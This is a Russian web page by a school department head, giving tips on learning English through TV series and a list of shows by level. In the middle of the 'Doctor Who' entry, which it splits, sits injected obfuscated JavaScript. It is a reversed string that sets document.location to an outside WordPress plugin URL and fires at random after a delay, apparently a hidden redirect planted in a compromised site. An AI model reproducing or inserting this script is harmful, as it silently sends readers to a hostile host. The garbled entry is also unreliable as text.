logo

Как учить английский по сериалам?

Свободное время дома можно и нужно проводить с пользой, например, за просмотром сериала на английском языке! Это не только возможность развлечься, но способ улучшить восприятие языка на слух и значительно расширить свой лексический запас.

Как учить английский по сериалам?

  1. Выписывайте новые слова и фразы — выбирайте те, которые вы сможете применить в повседневной жизни;
  2. Старайтесь по максимуму использовать выписанные слова и выражения: развесьте стикеры по комнате, используйте фразы в разговоре;
  3. Не бойтесь лишний раз вставить в свою речь какой-нибудь англицизм, пускай друзья знают, что это новая крутая фраза, которую вы выучили, смотря сериал;
  4. Поначалу можете учить английский по сериалам с субтитрами — так вы будете одновременно слышать английскую речь и видеть ее в субтитрах, что значительно усилит эффект запоминания. Но не забывайте, что в скором времени будет лучше отказаться и от субтитров, чтобы не привыкать к легкости восприятия и не потерять прогресс от изучения английского по сериалам.

Сериалы для начинающего уровня

  • Extr@ (12+)

«Экстра» — серия британских обучающих иностранным языкам ситкомов. Сюжеты здесь простые и доступные, фразы легко можно осознать и повторить.

  • Peppa Pig (0+)

Просмотр этого детского мультсериала на английском языке действительно будет полезным. Лексика и сюжеты максимально просты для понимания.

Сериалы для базового уровня

  • Alf (0+)

«Альф» — это позитивное настроение и отлично проведённое время! Благодаря этому сериалу вы пополните словарный запас повседневной американской лексикой и типичными разговорными фразами.

  • Glee (16+)

Сериал «Хор» («Лузеры») рассказывает о школьных неудачниках, которые по чистой случайности оказываются объединены общим делом. Этот сериал обязательно оценят любители музыки.

Сериалы для основного среднего уровня

  • Unbreakable Kimmy Schmidt (14+)

Очень душевный и смешной сериал для семейного просмотра.

  • Lost (16+)

Сериал изобилует всевозможными спецэффектами и зрелищными сценами, по которым вполне можно догадаться о том, что вы не уловили из разговоров героев. К тому же тут можно услышать речь с различными акцентами — актеры имеют разное происхождение, — что делает язык фильма очень богатым.

  • Riverdale (16+)

Отличный молодежный вариант для изучения английского языка.

  • Friends (12+)

Культовый сериал, состоящий из диалогов на повседневные темы молодежи. Каждый диалог так и пестрит идиомами, пословицами, сленговыми выражениями и самой разнообразной лексикой.

Сериалы для продвинутого уровня

  • Sherlock (12+)

Неканоническая версия приключений Шерлока Холмса и доктора Ватсона, одна из лучших постановок по мотивам знаменитых романов Артура Конан Дойля.

  • House, M.D (16+)

Просмотр рекомендуется тем, кто хочет пополнить свою копилку вариантами искрометных шуточек в стиле знаменитого мизантропа.

  • Doctoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor who (12+)

Культовый британский научно-фантастический телесериал компании ВВС о загадочном инопланетном путешественнике во времени.

Приятного просмотра!

 

Заведующая кафедрой иностранных языков

Миленина Яна Андреевна